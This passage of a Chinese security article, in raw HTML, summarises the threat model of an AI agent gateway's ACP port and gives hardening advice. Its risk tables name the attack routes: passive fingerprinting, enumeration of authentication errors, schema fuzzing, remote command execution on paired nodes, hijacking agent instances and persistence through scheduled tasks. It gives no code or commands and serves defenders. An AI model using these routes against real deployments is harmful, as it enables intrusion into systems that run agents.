style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">05 </span></span><span leaf="">攻击面总结与威胁模型</span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">基于上述四层指纹和四项授权后实验，我们可以为 OpenClaw 的 ACP 暴露面绘制一个完整的威胁模型：</span></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4148550724637681" data-s="300,640" data-type="png" data-w="552" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011224" src="https://wechat2rss.xlab.app/img-proxy/?k=18ad103f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCnJ59sq0IsL1beIgxXt1a9brdKP3WTuz3Bclf2A9yaoWcrv2jnMdP0QFhCBnJKShZ64icHibrH8WRWiayUkttk8YRSb7eARNO0N8s%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">5.1</span></b></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">未授权场景（公网暴露）</span></strong></p></div></div></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="20.0000%" width="20.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">风险等级</span></strong></p></div></div></td><td data-colwidth="30.0000%" width="30.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击面</span></strong></p></div></div></td><td data-colwidth="49.8200%" width="49.8200%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="text-align: center;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">描述</span></strong></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="20.0000%" width="20.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">高</span></strong></p></div></div></td><td data-colwidth="30.0000%" width="30.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">暴露面确认</span></p></div></div></td><td data-colwidth="49.8200%" width="49.8200%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通过 connect.challenge 被动指纹 100% 确认目标，无法规避</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="20.0000%" width="20.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">中</span></strong></p></div></div></td><td data-colwidth="30.0000%" width="30.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">架构信息泄露</span></p></div></div></td><td data-colwidth="49.8200%" width="49.8200%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">20种认证错误枚举出完整的认证架构</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="20.0000%" width="20.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">中</span></strong></p></div></div></td><td data-colwidth="30.0000%" width="30.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">API Schema 泄露</span></p></div></div></td><td data-colwidth="49.8200%" width="49.8200%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通过错误消息推导 API 定义（有限），通过 Schema Fuzzing 推导出内部 API 定义</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="20.0000%" width="20.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">中</span></strong></p></div></div></td><td data-colwidth="30.0000%" width="30.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">产品版本指纹</span></p></div></div></td><td data-colwidth="49.8200%" width="49.8200%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">错误消息中的术语特征可用于版本/配置推断</span></p></div></td></tr></tbody></table></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">5.2</span></b></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">认证绕过场景（Token 泄露）</span></strong></p></div></div></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="20.0000%" width="20.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">风险等级</span></strong></p></div></div></td><td data-colwidth="30.0000%" width="30.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击面</span></strong></p></div></div></td><td data-colwidth="49.8200%" width="49.8200%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="text-align: center;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">描述</span></strong></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="20.0000%" width="20.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">严重</span></strong></p></div></div></td><td data-colwidth="30.0000%" width="30.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">完整系统控制</span></p></div></div></td><td data-colwidth="49.8200%" width="49.8200%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">100+ RPC 方法暴露，涵盖配置、凭证、命令执行、设备管理</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="20.0000%" width="20.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">严重</span></strong></p></div></div></td><td data-colwidth="30.0000%" width="30.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">横向移动</span></p></div></div></td><td data-colwidth="49.8200%" width="49.8200%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">node.invoke 可远程调用已配对物理节点执行命令</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="20.0000%" width="20.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">高</span></b></p></div></div></td><td data-colwidth="30.0000%" width="30.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Agent 劫持</span></p></div></div></td><td data-colwidth="49.8200%" width="49.8200%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可枚举并操控已注册的 Agent 实例</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="20.0000%" width="20.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">高</span></strong></p></div></div></td><td data-colwidth="30.0000%" width="30.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">持久化后门</span></p></div></div></td><td data-colwidth="49.8200%" width="49.8200%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可通过 cron.add` 植入定时任务实现持久化</span></p></div></td></tr></tbody></table></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">5.3</span></b></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">核心结论</span></strong></p></div></div></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OpenClaw 的 ACP 端口不是一个简单的&#34;聊天接口&#34;，而是一个</span><strong style="box-sizing: border-box;"><span leaf="">具备完整系统管理能力的零信任网关。</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">它的认证机制虽然完善（多因子、速率限制、设备签名），但安全边界</span><strong style="box-sizing: border-box;"><span leaf="">完全依赖于认证层的完整性</span></strong><span leaf="">。一旦认证被绕过（Token 泄露、设备被入侵、Bootstrap Token 截获），攻击者获取的不是聊天记录，而是一条</span><strong style="box-sizing: border-box;"><span leaf="">能横向移动、能操纵物理节点的完整控制通道。</span></strong></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">06 安全建议</span></span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">针对部署了 OpenClaw 或类似 AI Agent 网关的企业：</span></p><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">建议</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">描述</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">暴露面管控</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ACP 端口不应直接暴露到公网。通过 Tailscale、WireGuard 等 VPN 或反向代理进行访问控制。OpenClaw 原生支持 Tailscale 身份认证，建议作为首选接入方式。</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">认证强化</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">使用高强度随机 Gateway Token；启用设备签名认证；定期轮换设备 Token</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">监控与告警</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">将 ACP 端口的异常连接行为纳入监控——频繁连接/断开、大量认证失败、Schema Fuzzing 特征</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">最小权限部署</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">评估是否需要启用所有 RPC 方法，考虑通过配置限制可用方法和 Agent</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">错误信息审计</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期审计面向客户端的错误响应，评估是否包含可被利用的内部架构信息</span></p></div></div></td></tr></tbody></table></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本次研究揭示了一个值得深思的现象：</span><strong style="box-sizing: border-box;"><span 